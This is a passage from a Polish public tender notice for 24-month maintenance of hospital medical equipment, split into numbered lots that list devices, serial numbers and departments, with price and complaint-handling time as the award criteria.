<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8
1. AUTOMATYCZNY WSTRZYKIWACZ KONTRASTU  MARK V PRO VIS    SN 91274 PRAC. BADAŃ NACZYNIOWYCH.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9
1.RESPIRATOR TRANSPORTOWY MEDUMAT STANDARD SOR  sn 0855
2. RESPIRATOR TRANSPORTOWY MEDUMAT STANDARD SOR  sn 15268.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10
1. MAMMOGRAF MULTIDIAGNOST  NMDB651  sn 12067 ZAKŁAD DIAGNOSTYKI OBRAZOWEJ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 11
1. DIATERMIA ICC 300 BLOK OPERACYJNY sn A1366
2. DIATERMIA ICC 200 PRACOWNIA ENDOSKOPII sn D2249
3. DIATERMIA APC 300 Z ARGONEM PRACOWNIA ENDOSKOPII sn C1604
4. DIATERMIA ICC 300E BLOK OPERACYJNY sn E1118
5. DIATERMIA VIO 300 Z ARGONEM sn D11311170
6. DIATERMIA ICC600 0094 ODDZ.UROLOGICZNY sn 1594
7. DIATERMIA ICC-80 PRACOWNIA BADAŃ NACZYNIOWYCH sn B2283
8. DIATERMIA OKULISTYCZNA 10739-002  SAALA OPERACYJNA OKULISTYCZNA sn1033.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 12
1. AUDIOMETR SD 25 ODDZ.LARYNGOLOGICZNY sn 63157
2. AUDIOMETR SD 30 ODDZ.LARYNGOLOGICZNY sn 69818
3. AUDIOMETR SD 30 ODDZ.LARYNGOLOGICZNY sn60840.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 13
1. ZESTAW DO WSPOMAGANIA ODDECHU CPAP INFANT FLOW SiPAP nr AKN 02122 ODDZ.NEONATOLOGII
2. ZESTAW DO WSPOMAGANIA ODDECHU CPAP INFANT FLOW nr LES 000395 ODDZ.NEONATOLOGII
3. RESPIRATOR   BEAR 2001  sn 15765 ODDZ.NEONATOLOGII
4. RESPIRATOR BEAR 750VS sn 53003272 ODDZ.NEONATOLOGII 
5. RESPIRATOR BEAR 2001sn 52802261 ODDZ.NEONATOLOGII
6. INKUBATOR  V-2100G TYP A  SN 1990202 ODDZ. NEONATOLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia rekalmacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 14
1. ELEKTROSTYMULATOR  GALUA DZIAŁ REHABILITACJI sn  5584418.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 15
1. KOMORA LAMINARNA SAFEMATE CYTO 1.2  sn K4400 PRAC.LEKU CYTOSTATYCZNEGO
2. KOMORA LAMINARNA C-(MAX-PRO)3-130  sn 1013080216 PRAC.LEKU CYTOSTATYCZNEGO
3. KOMORA LAMINARNA LAMIL 10 APTEKA sn 0647
4. KOMORA LAMINARNA LAMIL 10 APTEKA  sn 0652
5. KOMORA SAFEMATE 1,2 CYTO - BLOAIR   sn KO9T07N4281
6. KOMORA LAMIL  sn 0651/99  LABORATORIUM PRĄTKA
7. KOMORA LAMIL  sn 0927/00  LABORATORIUM PRĄTKA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 16
1. ELEKTROSTYMULATOR IFA 3 sn 3F0215 DZIAŁ REHABILITACJI
2. DIATERMIA SW-500 sn 5T60005 DZIAŁ REHABILITACJI
3. MULTISTIMULATOR UNICO sn F0503 DZIAŁ REHABILITACJI
4. MULTISTIMULATOR  ST-26 SN N1568 DZIAŁ REHABILITACJI
5. ZESTAW DO LASEROTERAPII  TERAPUS 2  sn 1472 DZIAŁ REHABILITACJI
6. ZESTAW DO BIOSTYMULACJI LASEROWEJ CTL 1202 S sn 0038 DZIAŁ REHABILITACJI
7. ZESTAW DO BIOSTYMULACJI LASEROWEJ CTL 1106 MX  sn 139 DZIAŁ REHABILITACJI
8. ELEKTROSTYMULATOR S-210  sn 880250  DZIAŁ REHABILITACJI
9. ELEKTROSTYMULATOR S-210  sn 890253  DZIAŁ REHABILITACJI
10. ELEKTROSTYMULATOR S-210  sn  950062  DZIAŁ REHABILITACJI
11. ZESTAW DO MAGNETOTERAPII  TERMO 500  sn00815  DZIAŁ REHABILITACJI
12. ZESTAW DO KRIOSTYMULACJI TLENKIEM AZOTU KRIOPOL R  sn075/05/09  DZIAŁ REHABILITACJI
13. ZESTAW DO MAGNETOTERAPII 90B  sn 051  DZIAŁ REHABILITACJI
14. SONIKATOR  S-730   sn 65XU321 DZIAŁ REHABILITACJI
15. SONIKATOR  S-730  118XU1494    DZIAŁ REHABILITACJI
16. ZESTAW DO MAGNETOTERAPII  VER.2.26  DZIAŁ REHABILITACJI
17. ELEKTROSTYMULATOR  GALVA 5 sn 584418   DZIAŁ REHABILITACJI
18. ZESTAW DO MAGNETOTERAPII  I  LASEROTERAPII MF-24     sn 33
DZ. REHABILITACJI WYSOKA ŁĄKA
19. EELEKTROSTYMULATOR  S-210  sn 890155  DZ. REHABILITACJI WYSOKA ŁĄKA
20. STÓŁ  DO MASAŻU  BOBATH sn023820-1004-40 DZ. REHABILITACJI WYSOKA ŁĄKA
21. STÓŁ  DO MASŻU  ATLET DZ. REHABILITACJI WYSOKA ŁĄKA
22. KABINA  DO ĆWICZEŃ WSC-4  
sn 119/11/11.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 17
1. STÓŁ OPERACYJNY FOCUS 1131 BLOK OPERACYJNY
2. STÓŁ OPERAYJNY VARIUS 1156 BLOK OPERACYJNY
3. STÓŁ OPERACYJNY VARIUS 1158 BLOK OPERACYJNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 18
1. ECHOKARDIOGRAF  VIVID 4 10537 ODDZ.KARDIOLOGICZNY
2. USG LOGIQ 200 96596SM2 SOR
3. ECHOKARDIOGRAF VIVID 7 PRO 12042V7L  ODDZ. KARDIOLOGICZNY
4. USG LOGIQ 200 94700SM2 ODDZ.WEWNĘTRZNY
5. USG LOGIQ 500  694377YM3 ODDZ.UROLOGICZNY
6. USG LOGIQ  7   39039YU3 ZDO
7. USG LOGIQ  P5  NR 118702SUO   ODDZ. NEONATOLOGII
8. ECHOKARDIOGRAF VIVID S6  2161VS6 ODDZ.KARDIOLOGICZNY
9. USG VOLUSON  S8  180787SU4  ODDZ. GINEK-POŁOZN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 19
1. APARAT DO OTOEMISJI OT1 139671 ODDZ.LARYNGOLOGICZNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 20
1. APARAT RTG PRZEWOZNY PRAKTIX 33 PLUS ZAKŁAD DIAGNOSTYKI OBRAZOWEJ sn PS743
2. APARAT RTG BV-25 GOLD SN SBODR00086 BLOK OPERAC.
3. APARAT RTG ARCOMA-SYMPATHIES ZAKŁAD DIAGNOSTYKI OBRAZ.sn1023.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 21
1. DIATERMIA  FORCE 2-8PCH  F8C34624T BLOK OPERAC.
2. DIATERMIA FORCE 2-8PCH  F9K37647T ODDZ.POŁOŻN.-GINEK.
3. DIATERMIA FORCE 300  F8I2939B BLOK OPERACYJNY
4. DIATEMIA  FORCE 300  F8G2586B BLOK OPERACYJNY
5. DIATERMIA CHIRURGICZNA FORCE 2-8PCH   F9K3765 ODDZ.CHIRURGII ONKOLOGICZNEJ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 22
1. STÓŁ OPERACYJNY MAQET  00201 BLOK OPERACYJNY
2. STÓŁ OPERACYJNY MAQET  00291 BLOK OPERACYJNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadnie nr 23
1. APARAT DO ZNIECZULEN  FABIUS BLOK OPERACYJNY sn 10392
2. APARAT DO ZNIECZULEN  FABIUS SOR sn 10634
3. APARAT DO ZNIECZULEN  JULIAN BLOK OPERACYJNY sn ARNN0116
4. STANOWISKO  DO ZNIECZULANIA  PRIMUS  sn ASCC-01143
5. STANOWISKO  DO ZNIECZULANIA  PRIMUS  sn ASCC-01136
6. STANOWISKO  DO ZNIECZULANIA  PRIMUS  sn ASCC-01137
7. STANOWISKO  DO ZNIECZULANIA  PRIMUS  sn ASCC-01138
8. RESPIRATOR TRANSPORTOWY OXYLOG 2000  SN ARNL-0079 SOR
9. RESPIRATOR EVITA 2DURA sn 8411950 DDZ.KARDIOLOGICZNY
10. INKUBATOR NOWORODKOWY 8000SC sn ARPD 0041 ODDZ.NEONATOLOGII
11. INKUBATOR  OTWARTY  8000 ARNC 0010 ODDZ.NEONATOLOGII
12. KARDIOMONITOR INFINITY KAPPA sn 5494157453.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 24
1. ANGIOGRAF DIGITEX ALPHA PLUS
PRAC.KARDIOLOGII INTERWENCYJNEJ snOQ2400161.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 15
1. VIDEOBRONCHOSKOP   EB-1570K G110561 PRAC.BRONCHOSKOPII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 26
1. RESPIRATOR SERVOVENTILATOR 300A  sn 10123  OAiIT
2. RESPIRATOR SERVOVENTILATOR i  sn 73282 ODDZ.NEONATOLOGII
3. RESPIRATOR SERVOVENTILATOR  isn 43550  ODDZ.NEONATOLOGII
4. RESPIRATOR SERVOVENTILATOR 300A  sn 10169  OAiIT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 27
1. APARAT USG  NANOM SN 03HPNW / QRV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 28
1. VIDEOGASTROFIBEROSKOP GIF-165 2905077   PRAC.ENDOSKOPII
2. VIDEOKOLNOSKOP CF-Q165L PRAC.ENDOSKOPII 2902707
3. VIDEOBRONCHOFIBEROSKOP BF-XP160F 2800604  PRAC.BRONCHOSKOPII
4. VIDEOBRONCHOFIBEROSKOP BF-Q180 2802428  PRAC.BRONCHOSKOPII
5. VIDEO PROCESOR CV-180 7777375 PRAC.BRONCHOSKOPII
6. ZRÓDŁO ŚWIATŁA CLV-180 7606613 PRAC.BRONCHOSKOPII
7. VIDEOKOLONOSKOP CF-Q145I 2514252  PRAC ENDOSKOPII
8. ZRÓDŁO SWIATŁA CLV-160 7513211 PRAC.ENDOSKOPII
9. VIDEO PROCESOR CV-160 7527349 OAiIT
10. VIDEODUODENOSKOP TJF-145 2500913  PRAC.ENDOSKOPII
11. BRONCHOSKOP BF XT20 sn 2900159 OAiIT
12. BRONCHOSKOP  BF TE2 sn 2102783 PRAC,BRONCHOSKOPII KOWARY
13. FLUSHING PUMP  OFP-2 sn 21018539 PRACOWNIA ENDOSKOPII
14. GASTROSKOP  GIF-Q 165 sn 2106615 PRACOWNIA ENDOSKOPII
15. GASTROSKOP GIF Q-165 sn 2702420 PRACOWNIA ENDOSKOPII
16. KAMERA OTV-SC  sn 7713081 PRACOWNIA BRONCHOSKOPII KOWARY
17. KAMERA OTV 35  sn 4247480297 PRACOWNIA BRONCHOSKOPII KOWARY
18. KOLONOSKOP CF-Q 165L  sn 2003412 PRACOWNIA ENDOSKOPII
19. PROCESOR VIDEO OTV 35C  sn 7752872 PRAC.BRONCHOSKOPII KOWARY
20. PROCESOR VIDEO CV-180 sn 7009180 PRAC.ENDOSKOPII
21. SSAK ELEKTRYCZNY SSU-2  sn 9703252 PRAC.BRONCHOSKOPII
22. VIDEOPROCESOR CL-160 EVIS EXERA  sn 7527349
23. WÓZEK ENDO  WN-NP1  sn 2909369 PRAC.ENDOSKOPII
WÓZEK ENDO WM-NP1 sn 2102009
PRAC.ENDOSKOPII
WÓZEK  DO ZESTAWÓW ENDOSKOPOWYCH  KOMPLETNY
PROCESOR VIDEO CV 160 sn 7538665
ZRÓDŁO ŚWIATŁA  CLV 160 sn 733105
MONITOR  VIDEO  OEV-134 sn 908278
PRAC> BRONCHOSKOPII  KOWARY
ZRÓDŁO SWIATŁA CLV-160 EVIS EXERA  sn 7546229  OAiIT PRAC.BRONCHOSKOPII
ZRÓDŁO ŚWIATŁA  CLE E  sn 7912681
PRAC.BRONCHOSKOPII KOWARY
ZRÓDŁO SWIATŁA  CLV-180  sn 7017932 PRAC.ENDOSKOPII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie nr 29.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 29
1. TOMOGRAF OKULISTYCZNY  OCT/SLO  1474 ODDZ.OKULISTYCZNY
2. MIKROSKOP LUSTRZANY  EM 3000 sn 891511  ODDZ.OKULISTYCZNY
3. LASER OKULISTYCZNYSOLITAIRE LP4532   4A2176S ODDZ.OKULISTYCZNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie nr 30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 30
1. DEFIBRYLATOR LIFE POINT 09LPP014  BLOK OPERACYJNY
2. DEFIBRYLATOR LIFE POINT 09LPP130 ODDZ. PULMONOLOGICZNY
3. DEFIBRYLATOR LIFE POINT 12LPP418 ODDZ. OTOLARYNG.
4. DEFIBRYLATOR LIFE POINT 12LPP417 NEUROLOGICZNY
5. DEFIBRYLATOR LIFE POINT 12LPP419 ODDZ. CHIR.OGÓLNEJ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie nr 31.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 31
1. NOSOLARYNGOSKOP  ER 270FP 2Y114A064 ODDZ.LARYNGOLOGICZNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zadanie nr 32.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 32
1. RESPIRATOR HAMILTON G5  SN 7580    OAIIT
2. RESPIRATOR HAMILTON G5   SN 7601   OAIIT
3. RESPIRATOR HAMILTON G5  SN 7628 OAIIT
4. RESPIRATOR HAMILTON G5  SN 7626 OAIIT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Zadanie nr 33.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 33
1. APARAT DO HEMIODIALIZY AK 200S sn 19358
2. APARAT DO HEMIODIALIZY AK 200 sn 3195
3. APARAT DO HEMIODIALIZY AK 95 sn 5793
4. APARAT DO HEMIODIALIZY AK 95 sn 5814
5. APARAT DO HEMIODIALIZY AK 95 sn 5784
6. APARAT DO HEMIODIALIZY AK 200ULTRA sn 825
7. APARAT DO HEMIODIALIZY AK 200 sn 1409
8. APARAT DO HEMIODIALIZY AK 96 sn 14536
9. APARAT DO HEMIODIALIZY AK 95 sn 5818
10. APARAT DO HEMIODIALIZY AK 95S sn29567
11. APARAT DO HEMIODIALIZY AK 95S sn29568
12. APARAT DO HEMIODIALIZY AK 95S sn29569
